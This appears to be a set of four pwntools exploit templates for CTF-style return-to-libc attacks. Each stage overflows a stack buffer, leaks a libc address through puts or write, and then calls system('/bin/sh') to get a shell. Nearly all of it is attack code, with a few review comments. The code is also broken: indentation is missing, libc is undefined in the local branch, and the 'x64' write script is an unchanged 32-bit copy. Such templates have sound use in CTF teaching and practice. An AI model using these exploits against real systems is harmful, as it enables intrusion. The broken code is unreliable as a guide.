(1)puts_exp.py
from pwn import *
# Template for a two-stage return-to-libc exercise against a 32-bit binary
# (CTF-style). Stage 1 overflows a stack buffer to call puts@plt on puts's
# own GOT entry, which prints the resolved libc address; stage 2 reuses the
# same overflow with libc-relative addresses. The blanks (offset, remote
# host, libc path) are left for the user, so the file does not run as-is.
# NOTE(review): the bodies of the if/else below are unindented — the
# indentation was most likely lost when the page was extracted; as written
# this does not parse.
# NOTE(review): Python 2-era pwntools idioms (str payloads, `.next()` on the
# search() generator); confirm the intended Python/pwntools version.
# Defender's note: the fixed e.plt/e.symbols addresses assume a non-PIE
# binary, and the flat `offset*'a'` overwrite assumes no stack canary;
# either mitigation breaks this template.
local = 1
# Target binary; its PLT/GOT/symbol addresses are used directly below.
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
# libc is only bound in the remote branch; with local == 1 the base_addr
# line further down raises NameError unless this line is restored.
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
# Must be the same libc build the target loads, or the offsets below are wrong.
libc = ELF("")
# context(log_level = 'debug')
# puts@plt is the call target for the leak; puts@got is what gets printed.
puts_plt_addr = e.plt["puts"]
puts_got_addr = e.got["puts"]
# Returning to main after the leak lets the same overflow be triggered again.
main_addr = e.symbols["main"]
# Number of bytes from the buffer start to the saved return address
# (left blank in the template; it is binary-specific).
offset =
# Fake 32-bit frame: return target (puts@plt), its return address (main),
# its first stack argument (puts@got).
payload1 = offset*'a' + p32(puts_plt_addr) + p32(main_addr) + p32(puts_got_addr)
#r.recvuntil()
r.sendline(payload1)
# The first 4 bytes puts writes are the little-endian address of puts in libc.
puts_addr = u32(r.recv(4))
print(hex(puts_addr))
#pause()
# libc base = leaked runtime address - the symbol's offset inside the libc file.
base_addr = puts_addr - libc.symbols["puts"]
system_addr = base_addr + libc.symbols["system"]
# search() yields match offsets; the first one is used.
binsh_addr = base_addr + libc.search("/bin/sh").next()
# Second frame: system, a return address (main) and system's argument.
payload2 = offset*'a' + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
#r.recvuntil()
r.sendline(payload2)
r.sendline("cat flag")
r.interactive()
(2)puts_x64_exp.py
from pwn import *
# x86-64 variant of the puts-leak return-to-libc template (CTF-style).
# On x86-64 the first argument travels in rdi, so each stage is a small ROP
# chain that starts with a `pop rdi; ret` gadget instead of a stack argument.
# Blanks (gadget address, offset, remote host, libc path) are left for the
# user, so the file does not run as-is.
# NOTE(review): the if/else bodies are unindented — indentation was most
# likely lost in extraction; as written this does not parse.
# NOTE(review): Python 2-era pwntools idioms (str payloads, `.next()`).
# Defender's note: relies on fixed (non-PIE) binary addresses and an
# unprotected return address (no canary); either mitigation breaks it.
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
# libc is only bound in the remote branch; with local == 1 the base_addr
# line below raises NameError unless this line is restored.
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
# Must match the libc build the target actually loads.
libc = ELF("")
# context(log_level = 'debug')
puts_plt_addr = e.plt["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
# Address of a `pop rdi; ret` gadget in the binary (binary-specific, blank here).
rdi_addr_ret =
# Bytes from buffer start to the saved return address (blank here).
offset =
# Chain: pop rdi <- puts@got; call puts@plt; then return into main.
payload1 = offset*'a' + p64(rdi_addr_ret) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)
#r.recvuntil()
r.sendline(payload1)
# Reads up to the first 0x7f byte and takes the 6 bytes ending there as the
# leaked address, zero-padded to 8 bytes. Assumes the libc address is a
# 6-byte value whose top byte is 0x7f — typical, but confirm for the target.
puts_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
print(hex(puts_addr))
#pause()
# libc base = leaked runtime address - symbol offset inside the libc file.
base_addr = puts_addr - libc.symbols["puts"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
# Chain: pop rdi <- "/bin/sh"; call system. The trailing p64(1) is
# presumably a dummy return address after system — confirm.
payload2 = offset*'a' + p64(rdi_addr_ret) + p64(binsh_addr) + p64(system_addr) + p64(1)
#r.recvuntil()
r.sendline(payload2)
r.sendline("cat flag")
r.interactive()
(3)write_exp.py
from pwn import *
# 32-bit return-to-libc template that leaks via write(1, write@got, 4)
# instead of puts (CTF-style). Same two-stage structure as the puts version:
# leak a libc address, compute the base, reuse the overflow.
# Blanks (offset, remote host, libc path) are left for the user, so the
# file does not run as-is.
# NOTE(review): the if/else bodies are unindented — indentation was most
# likely lost in extraction; as written this does not parse.
# NOTE(review): Python 2-era pwntools idioms (str payloads, `.next()`).
# Defender's note: relies on fixed (non-PIE) binary addresses and an
# unprotected return address (no canary); either mitigation breaks it.
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
# libc is only bound in the remote branch; with local == 1 the base_addr
# line below raises NameError unless this line is restored.
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
# Must match the libc build the target actually loads.
libc = ELF("")
# context(log_level = 'debug')
write_plt_addr = e.plt["write"]
write_got_addr = e.got["write"]
main_addr = e.symbols["main"]
# Bytes from buffer start to the saved return address (blank here).
offset =
# Fake 32-bit frame: write@plt, return address (main), then the three
# stack arguments fd=1 (stdout), buf=write@got, len=4.
payload = offset*'a' + p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)
#r.recvuntil()
r.sendline(payload)
# Exactly 4 bytes are written: the little-endian address of write in libc.
write_addr = u32(r.recv(4))
print(hex(write_addr))
#pause()
# libc base = leaked runtime address - symbol offset inside the libc file.
base_addr = write_addr - libc.symbols["write"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
# Second frame reuses the `payload` name: system, a dummy return address
# (1 rather than main here), and system's argument.
payload = offset*'a' + p32(system_addr) + p32(1) + p32(binsh_addr)
#r.recvuntil()
r.sendline(payload)
r.sendline("cat flag")
r.interactive()
(4)write_x64_exp.py
from pwn import *
# Listed as the x86-64 write-leak template, but the body is identical to
# the 32-bit write script above: p32/u32 packing and a 32-bit stack-argument
# frame, with no register gadgets. NOTE(review): this has not been adapted
# to x86-64 — confirm which target it is meant for before relying on it.
# Blanks (offset, remote host, libc path) are left for the user, so the
# file does not run as-is.
# NOTE(review): the if/else bodies are unindented — indentation was most
# likely lost in extraction; as written this does not parse.
# NOTE(review): Python 2-era pwntools idioms (str payloads, `.next()`).
# Defender's note: relies on fixed (non-PIE) binary addresses and an
# unprotected return address (no canary); either mitigation breaks it.
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
# libc is only bound in the remote branch; with local == 1 the base_addr
# line below raises NameError unless this line is restored.
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
# Must match the libc build the target actually loads.
libc = ELF("")
# context(log_level = 'debug')
write_plt_addr = e.plt["write"]
write_got_addr = e.got["write"]
main_addr = e.symbols["main"]
# Bytes from buffer start to the saved return address (blank here).
offset =
# 32-bit frame: write@plt, return address (main), stack args fd=1,
# buf=write@got, len=4. (32-bit layout; see the review note at the top.)
payload = offset*'a' + p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)
#r.recvuntil()
r.sendline(payload)
# Reads the 4 leaked bytes as a 32-bit little-endian address.
write_addr = u32(r.recv(4))
print(hex(write_addr))
#pause()
# libc base = leaked runtime address - symbol offset inside the libc file.
base_addr = write_addr - libc.symbols["write"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
# Second frame reuses the `payload` name: system, dummy return address 1,
# and system's argument.
payload = offset*'a' + p32(system_addr) + p32(1) + p32(binsh_addr)
#r.recvuntil()
r.sendline(payload)
r.sendline("cat flag")
r.interactive()